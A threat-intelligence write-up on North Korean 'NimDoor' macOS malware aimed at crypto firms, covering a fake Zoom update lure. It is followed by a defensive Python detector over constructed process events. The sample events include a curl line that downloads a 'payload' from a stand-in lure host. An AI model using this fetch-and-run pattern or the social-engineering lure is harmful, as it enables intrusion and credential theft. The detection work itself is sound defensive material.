In a surprising shift, North Korean threat actors have been found targeting Web3 and cryptocurrency businesses using malware developed in the Nim programming language. This revelation highlights the evolving tactics of these cybercriminals as they adapt to exploit vulnerabilities in emerging technology sectors. Reports from cybersecurity firm SentinelOne indicate that these attackers have implemented sophisticated techniques to infiltrate systems and harvest sensitive data.
According to researchers Phil Stokes and Raffaele Sabato, the malware, dubbed NimDoor, uses a process injection technique that is uncommon in macOS environments. The attackers communicate with their command-and-control infrastructure over encrypted WebSocket connections, signaling a new wave of sophisticated cyber attacks. The malware’s resilience is underscored by its persistence mechanism, which employs advanced signal handlers to remain active even after system reboots.
Part of the attack strategy involves social engineering: targeted individuals are first contacted through messaging platforms such as Telegram. They are then lured into a Zoom meeting scheduled through Calendly and given instructions to run a purported Zoom SDK update script. Running this script executes an AppleScript that pulls down the malicious payloads while misleading users into believing they have been redirected to a legitimate service.
Once the malware infects a device, it establishes backdoor communication with attacker-controlled servers, enabling the operators to send commands and gather system information. The malware is equipped with capabilities to extract sensitive credentials from popular web browsers and from applications such as Telegram. Its use of AppleScript allows data gathering to continue even after attempts to terminate the malware. The implications of this attack strategy are significant, as it reflects a worrying trend in the tactics employed by North Korean hackers to compromise organizations worldwide.
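The infection chain described above (a fake "Zoom SDK update" script that launches AppleScript and fetches payloads from attacker infrastructure) is something a defender can look for in endpoint process telemetry. The following is an added example, not code from the article or from SentinelOne: a small detector run over constructed macOS process-execution events. The event fields, the `ZOOM_DOMAINS` allow-list and every sample value (paths, hostnames, pids) are assumptions made for this example, not indicators from the report.

```python
"""Toy detection over constructed macOS process-execution events.

Two behaviours from the reported chain are flagged:
  1. a script whose name looks like a 'Zoom SDK update' spawning osascript
     (AppleScript execution), and
  2. that same script (via a child process) fetching content from a host
     that is not a Zoom domain.
The event shape, the allow-list and all sample values are constructed
for this example; they are not indicators published for NimDoor.
"""
from dataclasses import dataclass
from urllib.parse import urlparse
import re
import shlex


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    exe: str       # resolved executable path
    cmdline: str   # full command line as recorded by the sensor


# Hosts a genuine Zoom updater would be expected to contact (assumption).
ZOOM_DOMAINS = ("zoom.us",)

# Loose name pattern for the lure script, e.g. zoom_sdk_update.sh
LURE_NAME = re.compile(r"zoom.*(sdk|update)", re.IGNORECASE)


def is_zoom_domain(host: str) -> bool:
    """True if host is a Zoom domain or a subdomain of one."""
    host = host.lower()
    return any(host == d or host.endswith("." + d) for d in ZOOM_DOMAINS)


def fetched_hosts(cmdline: str) -> list:
    """Hostnames of any http(s)/ws(s) URLs appearing in a command line."""
    hosts = []
    for tok in shlex.split(cmdline):
        if tok.startswith(("http://", "https://", "ws://", "wss://")):
            host = urlparse(tok).hostname
            if host:
                hosts.append(host)
    return hosts


def detect(events: list) -> list:
    """Return (pid, reason) alerts for events matching the lure chain."""
    by_pid = {e.pid: e for e in events}
    alerts = []
    for e in events:
        parent = by_pid.get(e.ppid)
        parent_is_lure = parent is not None and bool(LURE_NAME.search(parent.cmdline))

        # Rule 1: the lure script launches AppleScript.
        if parent_is_lure and e.exe.endswith("/osascript"):
            alerts.append((e.pid, "zoom-update lure launched AppleScript"))

        # Rule 2: the lure script (or a child of it) downloads from a non-Zoom host.
        if (parent_is_lure or LURE_NAME.search(e.cmdline)) and e.exe.endswith("/curl"):
            for host in fetched_hosts(e.cmdline):
                if not is_zoom_domain(host):
                    alerts.append((e.pid, f"zoom-update lure fetched from {host}"))
    return alerts


# Constructed sample telemetry: one lure chain plus two benign events.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, "/bin/zsh", "zsh /Users/alice/Downloads/zoom_sdk_update.sh"),
    ProcEvent(101, 100, "/usr/bin/curl",
              "curl -s https://example-lure.invalid/payload -o /tmp/payload"),
    ProcEvent(102, 100, "/usr/bin/osascript", "osascript /tmp/update.scpt"),
    ProcEvent(103, 1, "/usr/bin/curl", "curl -s https://zoom.us/client/latest"),
    ProcEvent(104, 1, "/usr/bin/osascript",
              "osascript -e 'display notification \"backup done\"'"),
]


def run_detection() -> list:
    """Run the detector over the constructed sample events."""
    return detect(SAMPLE_EVENTS)


if __name__ == "__main__":
    for pid, reason in run_detection():
        print(f"pid {pid}: {reason}")
```

The two rules key on the parent/child relationship rather than on file hashes, so they survive a renamed payload; the trade-off is that a benign script whose name happens to match `LURE_NAME` and which legitimately runs `osascript` would also be flagged, so in production the rule belongs in a triage queue, not an automatic block.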